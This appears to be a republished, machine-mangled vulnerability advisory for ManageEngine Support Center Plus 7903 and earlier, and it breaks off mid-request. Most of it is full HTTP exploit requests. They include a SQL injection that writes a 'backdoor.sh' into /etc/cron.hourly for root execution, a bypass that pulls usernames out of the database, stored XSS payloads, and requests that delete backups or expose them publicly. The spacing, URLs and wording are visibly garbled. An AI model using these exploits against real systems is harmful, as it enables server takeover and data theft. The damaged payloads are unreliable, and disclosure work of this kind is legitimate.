ManageEngine Support Center Plus version 7903 and multiple defects

Title: ManageEngine Support Center Plus <= 7903 Multiple Vulnerabilities
Author: Robert 'xistence 'van Hamburg www.2cto.com (xistence <[AT]> 0x90. nl
: Http://www.manageengine.com/products/support-center/64045241/ManageEngine_SupportCenter_Plus_7_9_0_SP-0_3_0.ppm
Web site: http://www.manageengine.com/products/support-center/
Affected Versions: 7903 and earlier
Test System version: CentOS 5 Linux (Windows version also vulnerable, although untested)
To fix version: 7905 to the latest = 7908
+ Region-+
 
 
+ Region-+
| 0x01-SQL Injection in Row Count
+ Region-+
 
Normally when you click on the row count the following POST request is executed:
 
POST/servlet/AJaxServlet? Action = getWorkOrderCount HTTP/1.1
Host: supportcenter: 8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv: 6.0.2) Gecko/20100101 Firefox/6.0.2
Accept: text/javascript, text/html, application/xml, text/xml ,*/*
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.7
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/x-www-form-urlencoded; charset = UTF-8
Referer: http: // www.2cto.com/WOListView. do? ViewName = All_Requester
Content-Length: 2062
Cookie: JSESSIONID = 8C712F3C4F909CB5ABE4B2E9E688C55D; 2 RequestsshowThreadedReq = showThreadedReqshow;
2 RequestshideThreadedReq = hideThreadedReqhide; JSESSIONIDSSO = 5E58C910F58B97EF3776124641E4C4CC; PREV_CONTEXT_PATH =/custom
Pragma: no-cache
Cache-Control: no-cache
 
CountSql = select % 20 count (*) % 20 from % 20 workorder % 20wo % 20 left % 20 join % 20workorder_fields % 20wof % 20on % 20wo. workorderid % 3Dwof. workorderid % 20 left % 20 join % 20workorder_product % 20on % 20wo. workorderid % 3Dworkorder_product.workorderid % 20 left % 20 join % 20 componentdefinition % 20on % 20workorder_product.product_id % 3Dcomponentdefinition. componentid % 20 inner % 20 join % 20 workorderstates % 20wos % 20on % 20wo. workorderid % 3Dwos. workorderid % 20 left % 20 join % 20 categorydefinition % 20cd % 20on % 20wos. categoryid % 3Dcd. categoryid % 20 left % 20 join % 20 subcategorydefinition % 20scd % 20on % 20wos. subcategoryid % 3Dscd. subcategoryid % 20 left % 20 join % 20 aaauser % 20aau % 20on % 20wo. requesterid % 3Daau. user_id % 20 left % 20 join % 20 aaauser % 20ti % 20on % 20wos. ownerid % 3Dti. user_id % 20 left % 20 join % 20 statusdefinition % 20std % 20on % 20wos. statusid % 3Dstd. statusid % 20 left % 20 join % 20 departmentdefinition % 20dpt % 20on % 20wo. deptid % 3Ddpt. deptid % 20 left % 20 join % 20workorder_account % 20 woacc % 20on % 20wo. workorderid % 3Dwoacc. workorderid % 20 left % 20 join % 20 aaausercontactinfo % 20user_contact % 20on % 20aau. user_id % 3Duser_contact.user_id % 20 left % 20 join % 20 aaacontactinfo % 20 rcontact % 20on % 20user_contact.contactinfo_id % 3Drcontact. contactinfo_id % 20 left % 20 join % 20 leveldefinition % 20lvd % 20on % 20wos. levelid % 3Dlvd. levelid % 20 left % 20 join % 20 prioritydefinition % 20pd % 20on % 20wos. priorityid % 3Dpd. priorityid % 20 left % 20 join % 20 modedefinition % 20mdd % 20on % 20wo. modeid % 3Dmdd. modeid % 20 left % 20 join % 20 aaausercontactinfo % 20auci1% 20on % 20aau. user_id % 3Dauci1. user_id % 20 left % 20 join % 20 aaacontactinfo % 20aci1% 20on % 20auci1. contactinfo_id % 3Daci1. contactinfo_id % 20 left % 20 join % 20workorder_queue % 20wo_queue % 20on % 20wo. workorderid % 3Dwo_queue.workorderid % 20 left % 20 join % 20 queuedefinition % 20 queue % 20on % 20wo_queue.queueid % 3Dqueue. queueid % 20 left % 20 join % 20 sduser % 20crd % 20on % 20wo. createdbyid % 3Dcrd. userid % 20 left % 20 join % 20 aaauser % 20cri % 20on % 20crd. userid % 3Dcri. user_id % 20 left % 20 join % 20 aaaorganization % 20org % 20on % 20woacc. accountid % 3Dorg.org _ id % 20 left % 20 join % 20 aaaorganization % 20 sorg % 20on % 20woacc. subaccountid % 3Dsorg.org _ id % 20 where % 20% 20 (aau. user_id % 20% 3D % 202) % 20and % 20 (wo. isparent % 20% 3D % 20 '1') % 20and % 20 (wo. departmentid % 20% 3D % 201 )))
 
File access as root:
As you see, you can put a normal MySQL query in the countSql parameter.
However, I found out there is some input and output validation in place. It's not possible to use a "CREATE", or "INSERT" query. SELECT however is possible.
This still makes it possible to use the following trick:
 
Add an attachment to a (new) ticket, like a "backdoor. sh" and press attach. but do not press "DONE "! Keep the window open. The file will be in a temporary directory now. (/ManageEngine/SupportCenter/bin/Attachments/Request/<YOURUSERID> /)
 
Now send a POST request:
 
CountSql = select load_file (".. /.. /bin/Attachments/Request/<YOURUSERID>/backdoor. sh ") into dumpfile"/etc/cron. hourly/backdoor. sh ";
 
Which creates the backdoor. sh file in/etc/cron. hourly.
 
Above is a blind SQL injection, as you won't see the results in your browser.
Extra note: "grant" is possible too, so you cocould add any user or change permissions.
 
 
IDS/Output validation bypass:
 
After some testing I found out it's only possible to get numeric responses back in the web browser. so you can't read usernames/md5 hashes directly from the database. however, it's still possible to bypass this "protection ":
 
We can send a query that retrieves the username of user_id = 2 from the aaauser table, convert it to hex (base 16) and then convert it to base 10:
CountSql = select conv (hex (first_name), 16,10) from aaauser where user_id = 2;
 
This will give the following result:
 
444351214452
 
Now in any local MySQL instance you can convert that back to hex (base 16) and unhex it:
 
Mysql> select unhex (conv ('000000', 10, 16 ));
+ ------------------------------------- +
| Unhex (conv ('000000', 10, 16) |
+ ------------------------------------- +
| Guest |
+ ------------------------------------- +
 
 
+ Region-+
| 0x02-storage xss for anonymous users
+ Region-+
 
XSS/Cross Site Scripting vulnerability as anonymous user:
Http://www.bkjia.com/sd/Request. sd
Vulnerable input fields are: Name, Message
Input: <script> alert ('Hello World') </script>
 
E-mail: my-email @ test' <script> alert ('Hello World') </script>
 
 
+ Region-+
| 0x03-Stored XSS vulnerabilities as ANY authenticated user-user details
+ Region-+
 
Possible by browsing to this url and fill in the form fields
Http: // support: 8080/RequesterDef. do? Mode = edit & id = 2 (id of the current user)
Vulnerable input fields are: Name, Twitter Screen Name, Job Title
 
Input: <script> alert ('Hello World') </script>
 
+ Region-+
| 0x04-Stored XSS vulnerabilities as ANY authenticated user-ticket
+ Region-+
 
Create a new request through the website with the http: // <SUPPORTCENTER>: 8080/WorkOrder. do url as any user. enter any subject and select Plain Text on the description. enter <script> alert ("Hello World") </script> in the description field. press "Add Request ".
 
Now when you browse the http://www.bkjia.com/WOListView. do and click on the ticket you just created you'll receive a popup which says "Hello World", which makes it possible to put stored javascript/html code inside the description.
 
POST a new request (below are the headers to exploit this)
POST/WorkOrder. do HTTP/1.1
Host: support: 8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv: 5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.7
Proxy-Connection: keep-alive
Referer: http: // support: 8080/WorkOrder. do
Cookie: JSESSIONID = 75291FED727C1BCA5CD2F5A46AA97071; PREV_CONTEXT_PATH =; JSESSIONIDSSO = BA4D299A5FCBAB586F462AED5A730D67
Content-Type: application/x-www-form-urlencoded
Content-Length: 322
 
PARAMETERS: reqTemplate = & prodId = 0 & priority = 2 & reqID = 2 & usertypename = Requester & reqName = guest & category = 1 & item = 0 & subCategory = 0 & title = Test & description = % 3Cbr + % 2F % 3E % 3 Cscript % 3 Ealert % 28% 27 Hello + World % 27% 29% 3C % 2 Fscript % 3E & MOD_IND = WorkOrder & FORMNAME = WorkOrderForm & attach = & attPath = & component = Request & attSize = & attachments = & autoCCList = & addWO = addWO
 
 
+ Region-+
| 0x05-Anonymous Users Delete support center patch backup
+ Region-+
 
Delete Support Center Plus Backups as ANY authenticated user
Change the ids = to delete other backups
Http: // support: 8080 logs/BackupSchedule. do? Module = delete_backup & backup_ids = <ID>
 
 
+ Region-+
| 0x06-Create a Backup schedule as ANY authenticated user and write the backup file to a public accessible directory
+ Region-+
 
Create a Backup schedule as ANY authenticated user and write backup file to a public access directory
Below are the headers to create a backup schedule on. After this has been done, it's possible to download
The Support Center Plus backup file at http: // support: 8080/inlineimages/backup_supportcenter_7901_fullbackup_08_24_2011_13_10.data
For this you only need to know the version of the support center and the date/time (which we set our selfs in the POST)
 
POST/BackupSchedule. do HTTP/1.1
Host: support: 8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv: 5.0.1) Gecko/20100101 Firefox/5.0.1
Accept: text/javascript, text/html, application/xml, text/xml ,*/*
Accept-Language: en-us, en; q = 0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1, UTF-8; q = 0.7, *; q = 0.7
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.5.1.1
Content-Type: application/x-www-form-urlencoded; charset = UTF-8
Referer: http://www.bkjia.com/AdminHome. do
Cookie: JSESSIONID = 001cfc62780059cc1fc04ada6cf70000d; PREV_CONTEXT_PATH =; fromPortal = mermerportal; JSESSIONIDSSO = 57d961350a26a1d9c70afa6e000060e
DNT: 1
Pragma: no-cache
Cache-Control: no-cache
 
PARAMETERS module = save_schedule & days = 1 & backupStartDate = 2011-08-24 & hours = 13 & minutes = 10 & backupType = fullbackup & backupstatus = enabled & backupLocation = .. % 2 Finlineimages %